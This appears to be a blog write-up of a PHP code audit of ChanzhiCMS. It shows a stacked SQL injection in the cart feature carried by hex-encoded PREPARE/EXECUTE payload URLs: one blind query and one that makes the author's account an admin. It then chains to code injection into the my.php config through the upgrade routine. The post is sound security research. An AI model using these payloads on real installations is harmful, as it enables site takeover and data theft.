禅知CMS最新版Getshell

Category: Web
Tag: none
Written by Venenof7 with ♥ on January 15, 2017

One day,my friend-xiaojunjie send a url to me and our friend melody:'Come on,Let's do PHP code audit.
When I bulit this cms on my localhost webserver,he said:I find A SQLi in this cms...Orz...
For a short while,leqing said:'Pwned!Getshell' in QQ group.It's very good:)
But!!!u said together!!!I don't love you anymore QAQ
422b0c338744ebf8d39a0481dcf9d72a6159a774.jpg


This cms is a company'cms,it looks very safe,really?
So,when we have a cms source code.First,we should find what something we can post or get:)
OK.
We can find a funny code in /system/module/cart/control.php,code:

public function add($product, $count)
    {
        if($this->app->user->account == 'guest')
        {
            /* Save info to cookie if user is guest. */
            $this->cart->addInCookie($product, $count);
            $this->send(array('result' => 'success', 'message' => $this->lang->saveSuccess));
        }
        else
        {
            $result = $this->cart->add($product, $count);
            if($result) $this->send(array('result' => 'success', 'message' => $this->lang->saveSuccess));
            $this->send(array('result' => 'fail', 'message' => dao::getError()));
        }
    }

Of course,we aren't guest.
we find another add() in /system/module/cart/model.php:

    public function add($productID, $count)
    {
        $hasProduct = $this->dao->select('count(id) as count')->from(TABLE_CART)->where('account')->eq($this->app->user->account)->andWhere('product')->eq($productID)->fetch('count');

        if(!$hasProduct)
        {
            $product = new stdclass();
            $product->product = $productID;
            $product->account = $this->app->user->account;
            $product->count   = $count;
            $this->dao->insert(TABLE_CART)->data($product)->exec();
        }
        else
        {
            $this->dao->update(TABLE_CART)->set("count= count + {$count}")->where('account')->eq($this->app->user->account)->andWhere('product')->eq($productID)->exec();
        }

        return !dao::isError();
    }

The important code is set(),so we can grep it in /system/lib/base/dao/dao.class.php:

    public function set($set)
    {
        /* Add ` to avoid keywords of mysql. */
        if(strpos($set, '=') ===false)
        {
            $set = str_replace(',', '', $set);
            $set = '`' . str_replace('`', '', $set) . '`';
        }

        $this->sql .= $this->isFirstSet ? " $set" : ", $set";
        if($this->isFirstSet) $this->isFirstSet = false;
        return $this;
    }

It looks very hard:(,it replace ',',and this table of admin has '_',but we also find it use pdo,so we can use set+PREPARE+EXECUTE:)For example:
1.png

so,we can use time-blind sqli:)
http://127.0.0.1/chanzhieps/www/index.php/cart-add-1-1;set%20@b=0x73656c6563742069662828737562737472282873656c6563742064617461626173652829292c312c3129293d2765272c736c656570283130292c31293b;prepare%20x%20from%20@b;execute%20x;select%201%20union%201
it also need some time:)

Above all,we can update my account to admin:)

http://127.0.0.1/chanzhieps/www/index.php/cart-add-1-1;set%20@b=0x757064617465206570735f75736572207365742061646d696e3d27737570657227207768657265206163636f756e743d2776656e273b;prepare%20x%20from%20@b;execute%20x;select%201%20union%20select%201

OK!
a.png


And,next,can we getshell?
:)
We also know when we login in this cms as admin,if we want to getshell,we have three solution:

1-upload
2-wirte shell in config
3-other rce

So,we can easy find the config is my.php in /system/config/
Next,grep the config name,we can find it in these file location:

Veneno===> grep "my.php" -R *
system/config/config.php:/* Include my.php, domain.php and front or admin.php. */
system/config/config.php:$myConfig        = $configRoot . 'my.php';
system/module/common/model.php:        /* Overide the items defined in config/config.php and config/my.php. */
system/module/install/model.php:     * Create content of my.php from the post form.
system/module/install/model.php:     * Save my.php config file.
system/module/install/model.php:        $return->myPHP   = $this->app->getConfigRoot() . 'my.php';
system/module/site/model.php:        $myFile = $this->app->getConfigRoot() . 'my.php';
system/module/upgrade/control.php:        $this->view->customFile     =  $this->app->getConfigRoot() . 'my.php';
system/module/upgrade/model.php:            $myFile = $this->app->getConfigRoot() . 'my.php';
www/upgrade.php:/* Judge my.php exists or not. */
www/upgrade.php:$myConfig = $systemRoot . 'config/my.php';

And I find the funny code is in /system/module/upgrade/model.php:

 public function fixDetectDeviceConfig()
    {
        $mobileTemplateConfigList = $this->dao->setAutoLang(false)->select('value, lang')->from(TABLE_CONFIG)
            ->where('`key`')->eq('mobileTemplate')
            ->fetchAll();
        if(!empty($mobileTemplateConfigList))
        {
            $myFile = $this->app->getConfigRoot() . 'my.php';
            file_put_contents($myFile, "\n", FILE_APPEND);
            foreach($mobileTemplateConfigList as $mobileTemplateConfig)
            {
                $fixedConfig = '$config->framework->detectDevice[' . "'{$mobileTemplateConfig->lang}'] = ";
                $fixedConfig .= $mobileTemplateConfig->value == 'open' ? 'true' : 'false';
                $fixedConfig .= ";\n";
                file_put_contents($myFile, $fixedConfig, FILE_APPEND);
            }
        }
    }

And find it was used in public function execute($fromVersion):

case '5_5':
                $this->fixDetectDeviceConfig();
                $this->execSQL($this->getUpgradeFile('5.5'));
            default: if(!$this->isError()) $this->loadModel('setting')->updateVersion($this->config->version);

and execute() is in /system/module/upgrade/control.php:
aasd.png
and we also know the lang we can change because of sqli,so,we can write shell in my.php:
insert into eps_config set id=1000,owner='system',module='common',section='site',key='mobileTemplate',lang='veneno'];phpinfo();//',value=1;
33.png
OK!Look my.php:
QQ截图20170117013829.png
Wow!Getshell XD
QQ截图20170117014115.png
Feel so happy:)thks my friend xiaojunjie~


By the way:
when we login in the cms as admin,maybe we can upload .pht.Although we only can getshell webserver.

  •  
  •  
  • About Join --- SQLi
  • Pwnhub-深入敌后 -wp
取消回复

说点什么?

© 2019 Venenof7's Blog.